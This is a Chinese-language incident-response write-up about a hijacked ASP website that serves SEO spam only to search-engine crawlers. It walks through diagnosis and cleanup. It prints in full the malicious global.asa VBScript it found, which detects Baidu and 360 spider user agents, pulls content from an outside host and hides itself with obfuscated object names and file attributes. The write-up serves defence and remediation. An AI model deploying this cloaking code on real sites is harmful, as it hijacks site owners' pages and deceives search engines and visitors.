大量异常关键词

1.jpg

查看傲盾检测到的内容

2.jpg

经过测试,不要直接打开傲盾报出的链接地址,此时打开不会显示出任何异常;

把浏览器UA设置为百度蜘蛛头,清除所有缓存第一次打开首页即可看到被劫持情况。

3.jpg

检查思路:

1、首先检查首页文件是否加载了异常文件可以快速确认篡改点,一般是js文件,发现首页只加载了3个js,查看未有http网站域名等请求内容未发现异常

4.jpg

2、查看程序是否被篡改,asp代码相对简单,一般首页分为文件头部文件,内容区域文件,和底部文件,我们发现的内容出现在头部,优先排查头部文件

5.jpg

打开同目录下head.asp文件发现44行以后可以和首页源码对应上,

6.png

7.png

若是代码被篡改的问题,可以先确认为上图圈出的红色区域。

检查上图中的三个包含文件均正常,圈红的代码若是不知道什么作用,可以先一行一行的删除测试。

经过排查文件并未被篡改,通过扫描后门发现端倪,global.asa此文件作用类似web.config,是一个全局变量文件,若目录下有这个文件会自动被加载读取

百度的解释“Global.asa 它可包含可被 ASP 应用程序中每个页面访问的对象、变量以及方法的声明。所有合法的浏览器脚本都能在 Global.asa 中使用。

常见可劫持文件,“web.config ” “httpd.ini”  “.htaccess ”利用伪静态规则完成劫持,若是文件正常未被篡改的可以考虑检查这种情况。

Global.asa代码,可以明显的看到远程GET数据,判断若是360 百度等来路访问就获取到远程数据

<script CodePage=936 language=”vbscript” runat=”server”>

server.Scripttimeout=3600
dim ua,Remote_server,host_name,Remote_file,Content_mb
On Error Resume Next
ua=Request.ServerVariables(“HTTP_USER_AGENT”)
If Err.Number <> 0 Then
Err.Clear
End If
Remote_server=”http://seo.xashin.com/”
host_name=”http://”&request.servervariables(“HTTP_HOST”)&request.servervariables(“script_name”)
Remote_file = Remote_server&”/news.asp”&”?host=”&host_name

if(instr(ua,”360Spider”)>0 or instr(ua,”HaosouSpider”)>0 or instr(ua,”baidu”)>0)then
Content_mb=GetHtml(Remote_file)
response.write Content_mb
end if

Set fso = Server.CreateObject(“S”&”cr”&”ip”&”ti”&”ng.Fi”&”le”&”Sys”&”tem”&”Ob”&”je”&”ct”)
set f=fso.Getfile(Server.MapPath(“global.asa”))
if f.attributes <> 7 then
f.attributes = 7
end if

Function GetHtml(url)
On Error Resume Next
Set ObjXMLHTTP=Server.CreateObject(“MSXML2.serverXMLHTTP”)
ObjXMLHTTP.Open “GET”,url,False
ObjXMLHTTP.setRequestHeader “User-Agent”,”aQ0O010O”
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject(“Adodb.Stream”)
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = “gb2312”
GetHtml = objStream.ReadText
objStream.Close
If Err.Number <> 0 Then
Err.Clear
End If
End Function

</script>

具体分析可以参考http://blog.chinaunix.net/uid-31542418-id-5786635.html

保险起见此时我们把文件重命名再测试

针对D盾扫描到的木马文件手打打开识别删除,/upload/疑似上传漏洞导致,把此目录设置禁止执行脚本,IIS里打开网站选中目录-处理程序映射-编辑功能权限

9.png

会在Upload目录下生成一个web.config文件

10.png

测试正常后,可以新建一个文本文件名为Global.asa 设置网站运行账号禁止写入,目的是占位防止上传。